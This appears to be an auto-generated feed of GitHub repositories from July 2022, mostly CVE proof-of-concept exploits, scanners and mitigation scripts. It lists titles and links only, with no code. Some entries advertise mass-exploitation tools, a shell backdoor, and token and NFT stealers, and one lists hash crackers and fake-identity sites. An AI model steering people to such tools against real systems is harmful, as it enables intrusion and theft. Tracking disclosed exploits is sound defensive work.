**no description** : [linulinu/CVE-2022-34918](https://github.com/linulinu/CVE-2022-34918) create time: 2022-07-25T06:13:41Z

**Major Security Vulnerability on PrestaShop Websites - CVE-2022-31101** : [MathiasReker/blm-vlun](https://github.com/MathiasReker/blm-vlun) create time: 2022-07-24T21:50:13Z

**CVE-2014-7169 Shell Shock** : [prince-stark/SHELL-SCHOCK](https://github.com/prince-stark/SHELL-SCHOCK) create time: 2022-07-24T18:03:30Z

**no description** : [merlinepedra/CVE-2022-34918-LPE-PoC](https://github.com/merlinepedra/CVE-2022-34918-LPE-PoC) create time: 2022-07-24T14:47:55Z

**no description** : [merlinepedra25/CVE-2022-34918-LPE-PoC](https://github.com/merlinepedra25/CVE-2022-34918-LPE-PoC) create time: 2022-07-24T14:47:40Z

**Apache Spark RCE** : [llraudseppll/cve-2022-33891](https://github.com/llraudseppll/cve-2022-33891) create time: 2022-07-24T07:45:46Z

**An unrestricted file upload vulnerability in the Add New Assets function of Strapi v4.1.12 allows attackers to execute arbitrary code via a crafted file.** : [bypazs/CVE-2022-32114](https://github.com/bypazs/CVE-2022-32114) create time: 2022-05-29T15:25:08Z

**远程攻击者在Confluence未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,在现有脚本上修改了poc,方便getshell。** : [keven1z/CVE-2022-26134](https://github.com/keven1z/CVE-2022-26134) create time: 2022-07-23T14:38:11Z

**EXPLOIT FOR CVE IDRAC 8 2021** : [krdsploit/DELL-IDRAC-8-EXPLOIT](https://github.com/krdsploit/DELL-IDRAC-8-EXPLOIT) create time: 2022-07-23T08:55:55Z

**The New Exploit there no available on metasploit framework !** : [krdsploit/CVE-2002-2420](https://github.com/krdsploit/CVE-2002-2420) create time: 2022-07-22T21:33:26Z

**no description** : [AkbarTrilaksana/CVE-2022-32832](https://github.com/AkbarTrilaksana/CVE-2022-32832) create time: 2022-07-22T17:37:27Z

**THE FINAL POC FOR CVE-2022-26809 TO ACHIEVE RCE** : [ToomArni65/CVE-2022-26809-FINAL-POC](https://github.com/ToomArni65/CVE-2022-26809-FINAL-POC) create time: 2022-07-22T17:31:21Z

**Re Updating - Re Writing The 2004 CVE** : [krdsploit/CVE-2004](https://github.com/krdsploit/CVE-2004) create time: 2022-07-22T13:57:03Z

**Re Updated & Re Wrtiting** : [krdsploit/CVE-2004-TFTP](https://github.com/krdsploit/CVE-2004-TFTP) create time: 2022-07-22T13:55:51Z

**no description** : [d4rkduck/CVE-2022-0666](https://github.com/d4rkduck/CVE-2022-0666) create time: 2022-07-22T09:38:20Z

**Mitigation/fix of CVE-2021-41773 A Path Traversal And File Disclosure Vulnerability In Apache** : [EkamSinghWalia/Mitigation-CVE-2021-41773-](https://github.com/EkamSinghWalia/Mitigation-CVE-2021-41773-) create time: 2022-07-22T09:11:47Z

**CVE-2022-23131漏洞批量检测与利用脚本** : [1324132494/CVE-2022-23131poc-exp-zabbix-](https://github.com/1324132494/CVE-2022-23131poc-exp-zabbix-) create time: 2022-07-22T05:48:23Z

**no description** : [1mxml/CVE-2022-26138](https://github.com/1mxml/CVE-2022-26138) create time: 2022-07-22T05:43:14Z

**no description** : [J0hnbX/CVE-2022-30333](https://github.com/J0hnbX/CVE-2022-30333) create time: 2022-07-22T01:14:29Z

**no description** : [trhacknon/CVE-2022-34918-LPE-PoC](https://github.com/trhacknon/CVE-2022-34918-LPE-PoC) create time: 2022-07-21T22:06:19Z

**THE FINAL POC FOR CVE-2022-26809 TO ACHIEVE RCE** : [ToomArni65/CVE-2022-26809-POC](https://github.com/ToomArni65/CVE-2022-26809-POC) create time: 2022-07-21T17:32:15Z

**Proof-of-concept and write-up for the CVE-2022-32832 vulnerability patched in iOS 15.6** : [Muirey03/CVE-2022-32832](https://github.com/Muirey03/CVE-2022-32832) create time: 2022-07-21T13:09:50Z

**no description** : [rahul-masal/ubuntu22.04-cve2022](https://github.com/rahul-masal/ubuntu22.04-cve2022) create time: 2022-07-21T14:47:55Z

**no description** : [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2020-0137](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2020-0137) create time: 2022-07-21T11:57:43Z

**Atlassian Questions Hardcoded Password (CVE-2022-26138)** : [alcaparra/CVE-2022-26138](https://github.com/alcaparra/CVE-2022-26138) create time: 2022-07-21T09:28:06Z

**Detection and Remdiation of the Follina MSDT Vulnerability (CVE-2022-30190)** : [EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-](https://github.com/EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-) create time: 2022-07-21T06:49:44Z

**no description** : [2ntt/CVE-2022-30333](https://github.com/2ntt/CVE-2022-30333) create time: 2022-07-21T06:54:26Z

**no description** : [AkbarTrilaksana/cve-2022-33891](https://github.com/AkbarTrilaksana/cve-2022-33891) create time: 2022-07-20T22:52:43Z

**The Hight Speed MSF Console For Metasploit Framework To Exploit CVE 2015-2523** : [krdsploit/MSFu-Extentions-](https://github.com/krdsploit/MSFu-Extentions-) create time: 2022-07-20T21:02:41Z

**CVE-2021-22205 检测脚本,支持getshell和命令执行** : [keven1z/CVE-2021-22205](https://github.com/keven1z/CVE-2021-22205) create time: 2022-07-20T16:57:57Z

**no description** : [NeoWans/CVE-2018-19246](https://github.com/NeoWans/CVE-2018-19246) create time: 2022-07-20T13:06:26Z

**no description** : [randorisec/CVE-2022-34918-LPE-PoC](https://github.com/randorisec/CVE-2022-34918-LPE-PoC) create time: 2022-07-19T12:46:45Z

**CVE-2019-17621 DLink_RCE** : [Ler2sq/CVE-2019-17621](https://github.com/Ler2sq/CVE-2019-17621) create time: 2022-07-20T09:39:36Z

**vuln ejs 3.1.6 docker** : [miko550/CVE-2022-29078](https://github.com/miko550/CVE-2022-29078) create time: 2022-07-20T10:10:01Z

**CVE-2007-2447 samba remote code execution** : [mr-l0n3lly/CVE-2007-2447](https://github.com/mr-l0n3lly/CVE-2007-2447) create time: 2022-07-20T08:11:11Z

**CVE-2017-7921-EXP Hikvision camera** : [201646613/CVE-2017-7921](https://github.com/201646613/CVE-2017-7921) create time: 2022-07-20T07:07:07Z

**no description** : [Nivaskumark/packages_apps_Settings_CVE-2020-0188_A10_R33](https://github.com/Nivaskumark/packages_apps_Settings_CVE-2020-0188_A10_R33) create time: 2022-07-20T04:04:11Z

**PoC for CVE-2022-33891** : [west-wind/CVE-2022-33891](https://github.com/west-wind/CVE-2022-33891) create time: 2022-07-19T23:16:27Z

**PoC for CVE-2022-33891** : [west-wind/CVE-2022-33891-POC](https://github.com/west-wind/CVE-2022-33891-POC) create time: 2022-07-19T21:52:23Z

**Apache Spark Shell Command Injection Vulnerability** : [HuskyHacks/cve-2022-33891](https://github.com/HuskyHacks/cve-2022-33891) create time: 2022-07-19T18:52:12Z

**samAccountName Spoofing (CVE-2021–42278) & Domain Controller Impersonation (CVE-2021–42287)** : [IAMinZoho/sAMAccountName-Spoofing](https://github.com/IAMinZoho/sAMAccountName-Spoofing) create time: 2022-07-19T19:36:14Z

**This script will remediate the BootHole bug identified in CVE-2020-25632 and/or CVE-2021-20233.** : [pauljrowland/BootHoleFix](https://github.com/pauljrowland/BootHoleFix) create time: 2022-07-19T18:56:51Z

**cve-2022-29455 elementor wordpress plugin xss exploit** : [alirezasalehizadeh/cve-2022-29455](https://github.com/alirezasalehizadeh/cve-2022-29455) create time: 2022-07-16T15:29:26Z

**no description** : [abhyanandsharma311099/cve2021-41073](https://github.com/abhyanandsharma311099/cve2021-41073) create time: 2022-07-19T14:00:51Z

**CVE–2019–8985 Netis WF2411 RCE** : [Ler2sq/CVE-2019-8985](https://github.com/Ler2sq/CVE-2019-8985) create time: 2022-07-19T13:30:07Z

**:page_with_curl: A report about CVE-2021-44228** : [vidrez/Ethical-Hacking-Report-Log4j](https://github.com/vidrez/Ethical-Hacking-Report-Log4j) create time: 2022-07-19T08:03:05Z

**CVE-2021-44228 Log4J multithreaded Mass Exploitation tool compatible with URL/IP lists.** : [cybersecurityresearcher/CVE-2021-44228-Mass-RCE-Log4j](https://github.com/cybersecurityresearcher/CVE-2021-44228-Mass-RCE-Log4j) create time: 2022-07-19T07:13:28Z

**CVE-2022-26809 is a vulnerability in Remote Procedure Call Runtime** : [cybersecurityresearcher/CVE-2022-26809-RCE-POC](https://github.com/cybersecurityresearcher/CVE-2022-26809-RCE-POC) create time: 2022-07-19T07:18:45Z

**Unquoted Service Path Asus GameSdk** : [AngeloPioAmirante/CVE-2022-35899](https://github.com/AngeloPioAmirante/CVE-2022-35899) create time: 2022-07-18T14:06:58Z

**Remote Code Execution attacks are one of the most frequent methods employed by cybercriminals to compromise susceptible computers. In the previous year, a serious zero-day vulnerability was identified in Log4j, a java program used by developers for debugging and application modification loggings. This is also a significant vulnerability that affects the so-called Ghidra reverse engineering tool.** : [tharindudh/Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228](https://github.com/tharindudh/Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228) create time: 2022-07-18T20:33:10Z

**Verifed Proof of Concept on CVE-2022-24086 RCE** : [Cory65/CVE-2022-24086-POC](https://github.com/Cory65/CVE-2022-24086-POC) create time: 2022-07-18T17:49:03Z

**This is a revised version of MITRE's CICAT, made for use with modern (2022) ATT&CK and CVE data.** : [ShayanNGC/MITRE-CICAT-Revised](https://github.com/ShayanNGC/MITRE-CICAT-Revised) create time: 2022-07-18T17:14:15Z

**cve-2022-33891-poc** : [W01fh4cker/cve-2022-33891](https://github.com/W01fh4cker/cve-2022-33891) create time: 2022-07-18T16:16:51Z

**no description** : [rbowes-r7/unrar-cve-2022-30333-poc](https://github.com/rbowes-r7/unrar-cve-2022-30333-poc) create time: 2022-07-15T22:29:42Z

**no description** : [rwincey/Oracle-GoldenGate---CVE-2016-0451](https://github.com/rwincey/Oracle-GoldenGate---CVE-2016-0451) create time: 2022-07-18T14:08:58Z

**no description** : [ShaikUsaf/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138](https://github.com/ShaikUsaf/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138) create time: 2022-07-18T11:36:28Z

**no description** : [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-20138](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-20138) create time: 2022-07-18T11:01:39Z

**PoC for CVE-2022-23614 (Twig sort filter code execution)** : [davwwwx/CVE-2022-23614](https://github.com/davwwwx/CVE-2022-23614) create time: 2022-07-18T10:14:50Z

**CVE-2021-36955** : [JiaJinRong12138/CVE-2021-36955-EXP](https://github.com/JiaJinRong12138/CVE-2021-36955-EXP) create time: 2022-07-18T07:08:56Z

**no description** : [mchoudhary15/CVE-2022-22029-NFS-Server-](https://github.com/mchoudhary15/CVE-2022-22029-NFS-Server-) create time: 2022-07-18T06:23:53Z

**Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.** : [Shehzadcyber/CVE-2017-7529](https://github.com/Shehzadcyber/CVE-2017-7529) create time: 2022-07-18T05:14:55Z

**no description** : [trhacknon/CVE-2022-32119](https://github.com/trhacknon/CVE-2022-32119) create time: 2022-07-17T19:20:51Z

**nDay exploit for CVE-2021-27239** : [WizardsOfTheInternet/CVE-2021-27239](https://github.com/WizardsOfTheInternet/CVE-2021-27239) create time: 2022-07-17T18:03:15Z

**CVE-2022-24500 Windows SMB Unauthenticated Remote Code Execution Vulnerability** : [Daro1967/CVE-2022-24500-RCE](https://github.com/Daro1967/CVE-2022-24500-RCE) create time: 2022-07-17T11:25:12Z

**no description** : [ooooooo-q/cve-2022-32224-rails](https://github.com/ooooooo-q/cve-2022-32224-rails) create time: 2022-07-17T04:09:03Z

**no description** : [5xxxxx-Y/cve-2022](https://github.com/5xxxxx-Y/cve-2022) create time: 2022-07-17T08:29:42Z

**PoC for CVE-2022–30507** : [yosef0x01/CVE-2022-30507](https://github.com/yosef0x01/CVE-2022-30507) create time: 2022-07-16T15:55:28Z

**Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)** : [AngeloPioAmirante/CVE-2022-31897](https://github.com/AngeloPioAmirante/CVE-2022-31897) create time: 2022-07-16T10:55:32Z

**Zoo Management System 1.0 - Stored Cross-Site-Scripting (XSS)** : [AngeloPioAmirante/CVE-2022-33075](https://github.com/AngeloPioAmirante/CVE-2022-33075) create time: 2022-07-16T10:44:52Z

**cve-2022-29455 elementor wordpress plugin xss exploit** : [alyrezo/cve-2022-29455](https://github.com/alyrezo/cve-2022-29455) create time: 2022-07-16T01:29:13Z

**no description** : [n0v4mx/cve-2021-4034](https://github.com/n0v4mx/cve-2021-4034) create time: 2022-07-15T20:58:48Z

**🤖 List of useful resources for pentesters and hackers. • Exploits Database: https://www.shodan.io/ http://www.exploit-db.com http://packetstormsecurity.com • Vulnerabilities Database: https://nvd.nist.gov/ http://www.secdocs.org/ https://cve.mitre.org/cve/ http://www.cvedetails.com/ https://www.kb.cert.org/vuls/ http://lwn.net/Vulnerabilities/ http://www.vulnerability-lab.com http://www.securityfocus.com/bid https://secunia.com/community/advisories/search/ http://denimgroup.com/resources-threadfix/ • Hacking Tutorials: http://www.ehacking.net/ http://www.securitytube.net/ http://www.hacking-tutorial.com/ https://www.offensive-security.com/ http://breakthesecurity.cysecurity.org/ http://www.spacerogue.net/wordpress/ https://www.youtube.com/user/Hak5Darren https://www.youtube.com/user/sansinstitute https://vimeo.com/channels/fullscopesecurity http://www.kalitutorials.net/2013/08/kali-linux.html https://www.youtube.com/c/Nahamsec https://www.youtube.com/c/NetworkChuck https://www.youtube.com/c/BittenTech https://www.youtube.com/c/LoiLiangYang https://www.youtube.com/c/DavidBombal https://www.youtube.com/c/LiveOverflow https://www.youtube.com/user/DEFCONConference https://www.youtube.com/c/TheTechCherBD https://www.youtube.com/c/SimplilearnOfficial https://www.youtube.com/c/CyberTraining365official https://en.wikibooks.org/wiki/Metasploit/VideoTutorials • Virus Scan: http://fuckingscan.me/ http://v2.scan.majyx.net/ http://nodistribute.com/ http://www.file2scan.net/ http://anubis.iseclab.org/ https://anonscanner.com/ http://virusscan.jotti.org/it https://www.virustotal.com/nl/ • Tools Download: http://insecure.org/ http://www.kitploit.com/ http://www.toolswatch.org/ http://tools.kali.org/tools-listing http://www.romhacking.net/utilities/ http://www.blackarch.org/tools.html http://www.hackersonlineclub.com/hacking-tools https://www.concise-courses.com/hacking-tools/ https://gexos.github.io/Hacking-Tools-Repository/ http://www.darknet.org.uk/category/hacking-tools/ https://pentest-tools.com/reconnaissance/google-hacking • Network Online Tools: http://bgp.he.net/ http://www.dnswatch.info/ http://www.tcpiputils.com/ http://services.ce3c.be/ciprg/ http://www.yougetsignal.com/ http://www.coffer.com/mac_find/ http://www.nirsoft.net/countryip/ http://www.sockets.com/services.htm https://t.me/thegeeksnetwork • IP Lookup: http://ip-api.com/ http://ipaddress.com http://whatstheirip.com http://www.whatismyip.com/ http://www.ip2location.com/demo http://www.my-ip-neighbors.com/ http://freegeoip.net/static/index.html http://www.ip-adress.com/ipaddresstolocation/ • Join for more - https://t.me/BengalBlackDiamond • Encrypt / Decrypt: http://crypo.in.ua/tools/ http://codebeautify.org/encrypt-decrypt http://www.yellowpipe.com/yis/tools/encrypter/ http://www.tools4noobs.com/online_tools/decrypt/ http://textmechanic.com/Encryption-Generator.html • Online Hash Crackers: http://www.cmd5.org/ http://hashcrack.in/en https://crackstation.net/ http://passcracking.com/ http://md5.rednoize.com/ http://www.hashkiller.co.uk/ http://www.md5online.org/ http://www.md5crack.com/ http://md5decryption.com/ http://www.cloudcracker.net/ https://hdb.insidepro.com/en http://www.onlinehashcrack.com/ http://www.md5this.com/index.php http://www.netmd5crack.com/cracker/ http://www.tydal.nu/article/md5-crack/ https://isc.sans.edu/tools/reversehash.html • Anonymous Test: https://ipleak.net/ https://www.dnsleaktest.com/ https://diafygi.github.io/webrtc-ips/ • Github Resources: https://github.com/backdatedbackdoor/Cyber-Security-Resources https://github.com/blackhatethicalhacking/bugbountytools-methodology https://github.com/0x4rk0/Methodology https://github.com/BugBountyResources/ • Tor check: http://5deqglhxcoy3gbx6.onion - Xenobite http://tmkloc6vhxos3nde.onion • SMS: http://receive-sms-now.com/ http://www.receivesmsonline.net/ http://www.receive-sms-online.info/ • Fake Identity: https://fakena.me/ http://www.fakenamegenerator.com/ http://names.igopaygo.com/people/fake_person আমাদের অফিশিয়াল কমিউনিটিতে যুক্ত হতে টেলিগ্রাম চ্যানেলের লিঙ্ক টি দেয়া হলো - https://t.me/BengalBlackDiamond শুভকামনা সবার জন্য। #Happy_Learning #Stay_Safe #Stay_Secure** : [rana3333s/rs](https://github.com/rana3333s/rs) create time: 2022-07-15T18:26:56Z

**PoC for a security: potential path traversal with specific configs, if `mod_dirlisting` were enabled, which is not the default, this would result in listing the contents of the directory above the alias..** : [iveresk/cve-2018-19052](https://github.com/iveresk/cve-2018-19052) create time: 2022-07-15T11:51:13Z

**Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server.** : [iveresk/cve-2022-26134](https://github.com/iveresk/cve-2022-26134) create time: 2022-07-15T10:06:15Z

**no description** : [logm1lo/CVE-2022-0848-RCE](https://github.com/logm1lo/CVE-2022-0848-RCE) create time: 2022-07-15T06:28:21Z

**CVE-2022-32119 - Arox-Unrestricted-File-Upload** : [JC175/CVE-2022-32119](https://github.com/JC175/CVE-2022-32119) create time: 2022-04-06T04:33:47Z

**CVE-2022-32118 - Arox-XSS** : [JC175/CVE-2022-32118](https://github.com/JC175/CVE-2022-32118) create time: 2022-04-06T04:12:03Z

**A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228** : [bughuntar/log4j-scan](https://github.com/bughuntar/log4j-scan) create time: 2022-07-15T01:07:56Z

**CVE-2021-46422_PoC** : [twoning/CVE-2021-46422_PoC](https://github.com/twoning/CVE-2021-46422_PoC) create time: 2022-07-14T01:10:18Z

**CVE-2022-26134-PoC** : [twoning/CVE-2022-26134-PoC](https://github.com/twoning/CVE-2022-26134-PoC) create time: 2022-07-14T01:28:16Z

**CVE-2022-26134-PoC** : [twoning/CVE-2022-26134-PoC](https://github.com/twoning/CVE-2022-26134-PoC) create time: 2022-07-13T16:27:04Z

**CVE_2022_26134 poc** : [2212970396/CVE_2022_26134](https://github.com/2212970396/CVE_2022_26134) create time: 2022-07-13T14:42:33Z

**spring data mongodb remote code execution | cve-2022-22980 poc** : [Vulnmachines/Spring_cve-2022-22980](https://github.com/Vulnmachines/Spring_cve-2022-22980) create time: 2022-07-13T14:07:26Z

**CVE-2022-34265 Vulnerability** : [not-xences/CVE-2022-34265](https://github.com/not-xences/CVE-2022-34265) create time: 2022-07-13T13:02:41Z

**CVE-2022-22978 POC Project** : [aeifkz/CVE-2022-22978](https://github.com/aeifkz/CVE-2022-22978) create time: 2022-07-13T12:38:26Z

**CVE-2022-22978 Lab Project** : [aeifkz/CVE-2022-22978](https://github.com/aeifkz/CVE-2022-22978) create time: 2022-07-13T09:32:30Z

**no description** : [0xSojalSec/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736](https://github.com/0xSojalSec/Nuclei-TemplatesNuclei-Templates-CVE-2017-17736) create time: 2022-07-12T17:04:51Z

**no description** : [nb1b3k/CVE-2022-1421](https://github.com/nb1b3k/CVE-2022-1421) create time: 2022-07-12T14:34:48Z

**no description** : [Lubnan-Skech/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/Lubnan-Skech/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-07-12T12:38:46Z

**no description** : [Lubnan-Skech/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/Lubnan-Skech/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-07-12T12:30:43Z

**no description** : [Lubnan-Skech/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/Lubnan-Skech/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-07-12T12:30:21Z

**no description** : [kmahyyg/CVE-2022-22947](https://github.com/kmahyyg/CVE-2022-22947) create time: 2022-07-12T08:20:02Z

**This is a python script that can be used with Shodan CLI to mass hunting Confluence Servers vulnerable to CVE-2022-26134** : [p4b3l1t0/confusploit](https://github.com/p4b3l1t0/confusploit) create time: 2022-07-12T05:34:09Z

**H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416** : [safe3s/CVE-2022-35416](https://github.com/safe3s/CVE-2022-35416) create time: 2022-07-12T04:35:49Z

**PoC verification of Django vulnerability (CVE-2022-34265)** : [NopFault/CVE-2022-34265](https://github.com/NopFault/CVE-2022-34265) create time: 2022-07-11T11:58:09Z

**no description** : [CDACesec/CVE-2022-31901](https://github.com/CDACesec/CVE-2022-31901) create time: 2022-07-11T09:47:16Z

**no description** : [CDACesec/CVE-2022-31901](https://github.com/CDACesec/CVE-2022-31901) create time: 2022-07-11T07:16:41Z

**Mailcow CVE-2022-31138** : [ly1g3/Mailcow-CVE-2022-31138](https://github.com/ly1g3/Mailcow-CVE-2022-31138) create time: 2022-07-11T06:53:24Z

**no description** : [trhacknon/CVE-2022-33980-Apache-Commons-Configuration-RCE](https://github.com/trhacknon/CVE-2022-33980-Apache-Commons-Configuration-RCE) create time: 2022-07-10T18:29:04Z

**Tatsu Plugin ZIP File add_custom_font unrestricted upload** : [xdx57/CVE-2021-25094](https://github.com/xdx57/CVE-2021-25094) create time: 2022-07-10T17:01:43Z

**S2-061/S2-062 Struts2 远程命令执行漏洞 POC&EXP** : [z92g/CVE-2021-31805](https://github.com/z92g/CVE-2021-31805) create time: 2022-07-10T14:48:52Z

**Heap-based buffer overflow in aswRdr.sys (aka the TDI RDR driver) in avast! Home and Professional 4.8.1356.0 allows local users to cause a denial of service (memory corruption) or possibly gain privileges via crafted arguments to IOCTL 0x80002024.** : [Exploitables/CVE-2009-4049](https://github.com/Exploitables/CVE-2009-4049) create time: 2022-07-10T04:16:16Z

**The MsIo64.sys and MsIo32.sys drivers in Patriot Viper RGB before 1.1 allow local users (including low integrity processes) to read and write to arbitrary memory locations, and consequently gain NT AUTHORITY\SYSTEM privileges, by mapping \Device\PhysicalMemory into the calling process via ZwOpenSection and ZwMapViewOfSection.** : [Exploitables/CVE-2019-18845](https://github.com/Exploitables/CVE-2019-18845) create time: 2022-07-10T04:19:35Z

**The MsIo64.sys driver before 1.1.19.1016 in MSI Dragon Center before 2.0.98.0 has a buffer overflow that allows privilege escalation via a crafted 0x80102040, 0x80102044, 0x80102050, or 0x80102054 IOCTL request.** : [Exploitables/CVE-2021-27965](https://github.com/Exploitables/CVE-2021-27965) create time: 2022-07-10T04:22:55Z

**GILANG - Exploiter for CVE-2021-25094** : [TUANB4DUT/typehub-exploiter](https://github.com/TUANB4DUT/typehub-exploiter) create time: 2022-07-10T02:01:11Z

**Fastjson exploit** : [Expl0desploit/CVE-2022-25845](https://github.com/Expl0desploit/CVE-2022-25845) create time: 2022-07-09T21:56:10Z

**Attacks against QUIC (CVE 2022 30591)** : [efchatz/QUIC-attacks](https://github.com/efchatz/QUIC-attacks) create time: 2022-06-30T18:25:23Z

**CVE-2022-23222, managed with Rust.** : [RafaelOrtizRC/CVE-2022-23222](https://github.com/RafaelOrtizRC/CVE-2022-23222) create time: 2022-07-09T19:28:46Z

**no description** : [deidal0s/instagram_CVE_2019](https://github.com/deidal0s/instagram_CVE_2019) create time: 2022-07-09T15:22:36Z

**Script PoC that exploits the Tentacles upload functionality of OctoBot trading bot and which leads to a remote code execution (RCE). CVE-2021-36711** : [Nwqda/Sashimi-Evil-OctoBot-Tentacle](https://github.com/Nwqda/Sashimi-Evil-OctoBot-Tentacle) create time: 2021-09-14T00:10:30Z

**no description** : [iFreeDomain/CVE-2022-GE54JN-YH34E](https://github.com/iFreeDomain/CVE-2022-GE54JN-YH34E) create time: 2022-07-09T05:33:14Z

**no description** : [mmeza-developer/go--CVE-2018-6574](https://github.com/mmeza-developer/go--CVE-2018-6574) create time: 2022-07-08T22:47:22Z

**Exploiting Android Vulnerability in ES File Explorer** : [Chethine/EsFileExplorer-CVE-2019-6447](https://github.com/Chethine/EsFileExplorer-CVE-2019-6447) create time: 2022-07-08T14:45:50Z

**confluence rce** : [coskper-papa/CVE-2022-26134](https://github.com/coskper-papa/CVE-2022-26134) create time: 2022-07-08T12:24:21Z

**CVE-2022-33980 Apache Commons Configuration 远程命令执行漏洞** : [tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE](https://github.com/tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE) create time: 2022-07-08T09:25:42Z

**OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the News Feed module.** : [bypazs/CVE-2022-34963](https://github.com/bypazs/CVE-2022-34963) create time: 2022-06-28T11:32:28Z

**OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Group Timeline module.** : [bypazs/CVE-2022-34962](https://github.com/bypazs/CVE-2022-34962) create time: 2022-06-28T13:18:56Z

**OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Users Timeline module.** : [bypazs/CVE-2022-34961](https://github.com/bypazs/CVE-2022-34961) create time: 2022-06-28T13:08:40Z

**no description** : [9lyph/CVE-2022-29593](https://github.com/9lyph/CVE-2022-29593) create time: 2022-03-04T12:03:33Z

**CodoForum v5.1 - File Upload Bypass to RCE (Authenticated) exploit code** : [Vikaran101/CVE-2022-31854](https://github.com/Vikaran101/CVE-2022-31854) create time: 2022-07-07T15:33:07Z

**BIGIP CVE-2020-5902 Exploit POC and automation scanning vulnerability** : [z3n70/CVE-2020-5902](https://github.com/z3n70/CVE-2020-5902) create time: 2022-07-07T14:48:08Z

**CVE-2022-0847 SUID Shell Backdoor** : [notl0cal/dpipe](https://github.com/notl0cal/dpipe) create time: 2022-03-14T03:58:21Z

**no description** : [yoloskr/CVE-2017-9841-Scan](https://github.com/yoloskr/CVE-2017-9841-Scan) create time: 2022-07-07T08:57:58Z

**no description** : [aeyesec/CVE-2022-34265](https://github.com/aeyesec/CVE-2022-34265) create time: 2022-07-07T07:45:28Z

**CVE-2022-26135** : [safe3s/-CVE-2022-26135-](https://github.com/safe3s/-CVE-2022-26135-) create time: 2022-07-07T08:28:02Z

**no description** : [KasunPriyashan/CVE-2019_6447-ES-File-Explorer-Exploitation](https://github.com/KasunPriyashan/CVE-2019_6447-ES-File-Explorer-Exploitation) create time: 2022-07-07T06:22:06Z

**no description** : [Satheesh575555/libhwbinder_AOSP10_r33_CVE-2020-0136](https://github.com/Satheesh575555/libhwbinder_AOSP10_r33_CVE-2020-0136) create time: 2022-07-07T05:42:42Z

**CVE-2021-27850 ysoserial** : [novysodope/CVE-2021-27850](https://github.com/novysodope/CVE-2021-27850) create time: 2022-07-07T01:42:44Z

**A script to change OpenSSL versions on Ubuntu to 1.1.1q to protect against CVE-2022-2097.** : [PeterThomasAwen/OpenSSLUpgrade1.1.1q-Ubuntu](https://github.com/PeterThomasAwen/OpenSSLUpgrade1.1.1q-Ubuntu) create time: 2022-07-06T19:18:58Z

**no description** : [infobyte/cve-2022-27255](https://github.com/infobyte/cve-2022-27255) create time: 2022-07-06T17:29:04Z

**CVE-2022-32250 - Working Proof of Concept & Patch** : [0dayCTF/CVE-2022-32250_PoC](https://github.com/0dayCTF/CVE-2022-32250_PoC) create time: 2022-07-06T16:27:05Z

**Simple PoC-checker for CVE-2022-31749 by 1vere$k** : [iveresk/cve-2022-31749](https://github.com/iveresk/cve-2022-31749) create time: 2022-07-06T09:15:49Z

**no description** : [nidhi7598/packages_apps_Bluetooth_AOSP_10_r33_CVE-2022-20133](https://github.com/nidhi7598/packages_apps_Bluetooth_AOSP_10_r33_CVE-2022-20133) create time: 2022-07-06T07:33:51Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2022-20138](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2022-20138) create time: 2022-07-06T06:55:45Z

**CVE-2019-1405 CVE-2019-1322** : [signfind/COMahawk](https://github.com/signfind/COMahawk) create time: 2022-07-06T05:42:14Z

**no description** : [z92g/CVE-2022-0543](https://github.com/z92g/CVE-2022-0543) create time: 2022-07-06T04:35:59Z

**no description** : [f4yd4-s3c/cve-2022-26134](https://github.com/f4yd4-s3c/cve-2022-26134) create time: 2022-07-06T01:27:21Z

**no description** : [rbowes-r7/manageengine-auditad-cve-2022-28219](https://github.com/rbowes-r7/manageengine-auditad-cve-2022-28219) create time: 2022-07-01T22:40:46Z

**Exploit code for Jira Mobile Rest Plugin SSRF (CVE-2022-26135)** : [assetnote/jira-mobile-ssrf-exploit](https://github.com/assetnote/jira-mobile-ssrf-exploit) create time: 2022-06-24T07:55:52Z

**no description** : [PyterSmithDarkGhost/CVE-2022-21449-I2P-TLS-POC](https://github.com/PyterSmithDarkGhost/CVE-2022-21449-I2P-TLS-POC) create time: 2022-07-05T19:51:39Z

**exp of CVE-2022-0847** : [edr1412/Dirty-Pipe](https://github.com/edr1412/Dirty-Pipe) create time: 2022-07-05T19:22:50Z

**no description** : [GULL2100/Wordpress_xss-CVE-2022-29455](https://github.com/GULL2100/Wordpress_xss-CVE-2022-29455) create time: 2022-06-25T20:57:55Z

